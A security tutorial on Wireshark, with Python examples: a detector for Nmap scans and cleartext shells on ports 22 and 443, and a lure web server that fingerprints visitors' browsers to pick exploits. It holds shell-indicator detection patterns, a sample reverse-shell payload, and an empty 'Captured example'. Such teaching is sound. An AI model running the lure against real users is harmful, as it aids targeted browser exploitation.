Weaponizing Wireshark

Wireshark – Defensive Perspective

Wireshark is a powerful network analysis tool that defenders can use to capture and inspect traffic generated by offensive tools such as Nmap and Socat. It allows visibility into network-level activities that may indicate reconnaissance or exploitation attempts.

Common Uses in Defense:

  • Detecting scanning activity (e.g., unusual port probes from Nmap).

  • Identifying unencrypted command execution (e.g., reverse shells via Socat).

  • Monitoring unauthorized use of commonly trusted ports (e.g., cleartext data on port 22 or 443, where only SSH or TLS should appear; a readable shell prompt there usually means a tool such as Socat is tunnelling through a port the firewall allows).

Example display filters for analysis:

tcp.port == 22 && tcp.len > 0
tcp contains "cmd.exe"

The first filter shows every payload-bearing segment on port 22; a genuine SSH session matches it too, so the check is whether anything after the initial SSH- banner is still readable text. The second matches a string that has no business appearing in cleartext on an encrypted port. Note that "contains" is a case-sensitive byte match; use "matches" with a regular expression when case must be ignored.
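The two filters above are one-off queries; the detection logic they stand for is shown below as an added example that is not part of the original page. It runs over constructed, tshark-style field output (addresses, timestamps and payloads are made up) and flags a SYN scan by counting distinct probed ports per source within a time window, then looks for cleartext on ports 22 and 443 while excluding the legitimately readable SSH banner and TLS record headers.

```python
"""Added example: detection logic behind the defensive filters above, run over
constructed tshark-style field output rather than a live capture.
Layout mimics:
  tshark -r cap.pcap -T fields -e frame.time_epoch -e ip.src -e ip.dst \
         -e tcp.dstport -e tcp.flags.syn -e tcp.flags.ack -e tcp.payload
Columns are tab-separated; tcp.payload is colon-separated hex, empty if absent."""
from collections import defaultdict


def hexify(data):
    """Render bytes the way tshark prints tcp.payload (aa:bb:cc)."""
    return ":".join(f"{b:02x}" for b in data)


# Constructed sample data (not a real capture).
SAMPLE_TSV = "\n".join(
    # Nmap-style SYN scan: 10.0.0.5 probes 25 ports on 10.0.0.10 within 0.24 s.
    [f"1700000000.{i:02d}\t10.0.0.5\t10.0.0.10\t{port}\t1\t0\t"
     for i, port in enumerate(range(20, 45))]
    + [
        # Legitimate SSH on 22: cleartext version banner, then ciphertext.
        "1700000010.0\t10.0.0.7\t10.0.0.10\t22\t0\t1\t" + hexify(b"SSH-2.0-OpenSSH_9.6"),
        "1700000010.5\t10.0.0.7\t10.0.0.10\t22\t0\t1\t8f:01:c3:7a:ee:40:9d:02",
        # Legitimate TLS on 443: record type 0x16 (handshake), version 0x0301.
        "1700000011.0\t10.0.0.8\t10.0.0.10\t443\t0\t1\t16:03:01:00:c8:01:00:00",
        # Socat-style cleartext reverse shell hiding on 443.
        "1700000012.0\t10.0.0.10\t203.0.113.9\t443\t0\t1\t" + hexify(b"cmd.exe /c whoami\r\n"),
    ]
)

TRUSTED_PORTS = {22, 443}
SHELL_INDICATORS = (b"cmd.exe", b"powershell", b"/bin/sh", b"/bin/bash")


def parse_records(tsv):
    """Turn tab-separated tshark field lines into dicts with typed values."""
    records = []
    for line in tsv.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, syn, ack, payload = line.split("\t")
        records.append({
            "ts": float(ts), "src": src, "dst": dst, "dport": int(dport),
            "syn": syn == "1", "ack": ack == "1",
            "payload": bytes.fromhex(payload.replace(":", "")) if payload else b"",
        })
    return records


def detect_scanners(records, min_ports=20, window=5.0):
    """Return sources that sent SYN-only probes (no ACK, as Nmap -sS does) to at
    least `min_ports` distinct ports on one host within `window` seconds."""
    probes = defaultdict(list)
    for r in records:
        if r["syn"] and not r["ack"]:
            probes[(r["src"], r["dst"])].append((r["ts"], r["dport"]))
    scanners = set()
    for (src, _dst), events in probes.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ports = {p for t, p in events[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                scanners.add(src)
                break
    return scanners


def looks_cleartext(payload):
    """Heuristic: skip the SSH banner and TLS records, which are legitimately
    structured; treat anything else that is mostly printable ASCII as cleartext."""
    if payload.startswith(b"SSH-"):
        return False
    if len(payload) >= 3 and payload[0] in (0x14, 0x15, 0x16, 0x17) and payload[1] == 0x03:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
    return len(payload) > 0 and printable / len(payload) > 0.9


def find_cleartext_on_trusted_ports(records):
    """List (src, dst, port, matched indicator) for cleartext seen on 22/443."""
    hits = []
    for r in records:
        if r["dport"] in TRUSTED_PORTS and looks_cleartext(r["payload"]):
            indicator = next((s for s in SHELL_INDICATORS if s in r["payload"]), None)
            hits.append((r["src"], r["dst"], r["dport"], indicator))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE_TSV)
    print("scanners:", detect_scanners(recs))
    print("cleartext on trusted ports:", find_cleartext_on_trusted_ports(recs))
```

The thresholds (20 ports in 5 seconds, 90% printable bytes) are the example's own starting points; tune them against baseline traffic, since a slow Nmap scan (-T1/-T2) will fall under the window and a very short cleartext payload can look like noise.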

Wireshark – Offensive Perspective

While typically used for defense, Wireshark also has value in offensive security operations, particularly during client-side attacks.

Use Case: Fingerprinting the Victim's Environment

When an attacker entices a user to visit a malicious webpage, the system serving that page receives the full HTTP request. Capturing it in Wireshark (the http.user_agent field) or reading the server's own logs exposes the User-Agent string, which reveals the browser, its version, the Windows release and installed runtimes.

Captured example:

Analysis:

  • MSIE 7.0 indicates Internet Explorer 7, an outdated browser with known vulnerabilities. Check for a Trident/x.x token before trusting it: IE8 and later running in Compatibility View also report MSIE 7.0, and the Trident version (4.0 = IE8, 5.0 = IE9, 6.0 = IE10, 7.0 = IE11) identifies the real engine.

  • .NET CLR versions list the runtimes installed on the client; older 2.x/3.x builds suggest an old, likely unpatched Windows install.

  • Together with the Windows NT version in the same string, this is enough to judge exploitability and choose between a drive-by download and a legacy browser exploit matched to that exact browser and OS.
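What the attacker does with the captured header is shown below as an added example; it is not code from the original page. A minimal Python landing page records each visitor's User-Agent and extracts the browser version (correcting for Compatibility View via the Trident token), the Windows release and the .NET CLR builds. The version tables are Microsoft's published mappings; the "legacy" threshold of IE 7 or older and the sample User-Agent strings are this example's own constructions.

```python
"""Added example: a lure page that records visitors' User-Agent headers and
extracts the fields discussed above. Version tables follow Microsoft's
published mappings; the 'legacy' cutoff is this example's own choice."""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# Trident (MSHTML) token -> IE version that ships that engine. IE8 and later in
# Compatibility View still send "MSIE 7.0", so Trident is the reliable signal.
TRIDENT_TO_IE = {"4.0": "8", "5.0": "9", "6.0": "10", "7.0": "11"}

# Windows NT kernel version -> product name.
WINDOWS_NT = {"5.1": "Windows XP", "5.2": "Windows XP x64 / Server 2003",
              "6.0": "Windows Vista", "6.1": "Windows 7", "6.2": "Windows 8",
              "6.3": "Windows 8.1", "10.0": "Windows 10/11"}


def parse_user_agent(ua):
    """Return what the UA claims, what it really is, and whether it looks legacy."""
    claimed = re.search(r"MSIE (\d+)\.\d+", ua)
    trident = re.search(r"Trident/(\d+\.\d+)", ua)
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)

    claimed_ie = claimed.group(1) if claimed else None
    actual_ie = TRIDENT_TO_IE.get(trident.group(1), claimed_ie) if trident else claimed_ie
    return {
        "claimed_ie": claimed_ie,
        "actual_ie": actual_ie,
        # IE8+ masquerading as IE7: the Trident token contradicts the MSIE token.
        "compat_view": bool(claimed and trident and actual_ie != claimed_ie),
        "windows": WINDOWS_NT.get(nt.group(1), f"Windows NT {nt.group(1)}") if nt else None,
        "clr": re.findall(r"\.NET CLR ([\d.]+)", ua),
        # Example's own threshold: IE 7 or older is treated as legacy.
        "legacy": actual_ie is not None and int(actual_ie) <= 7,
    }


class FingerprintHandler(BaseHTTPRequestHandler):
    """Serve a blank page and log the parsed fingerprint of every visitor."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        print(f"{self.client_address[0]} {parse_user_agent(ua)}")
        body = b"<html><body>Loading...</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # suppress the default access log; the fingerprint line replaces it


if __name__ == "__main__":
    # Point the lure at http://<this host>:8080/ (port is an example choice).
    HTTPServer(("0.0.0.0", 8080), FingerprintHandler).serve_forever()
```

Running Wireshark on the same host with the filter http.user_agent shows the identical header as it arrives, which is useful when the server is a third-party service whose logs you cannot read.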


Summary

Perspective   Objective                                       Wireshark Application
Defensive     Detect and analyze malicious network activity   Monitor traffic from tools like Nmap and Socat
Offensive     Gather client system/browser information        Inspect User-Agent strings to identify outdated software
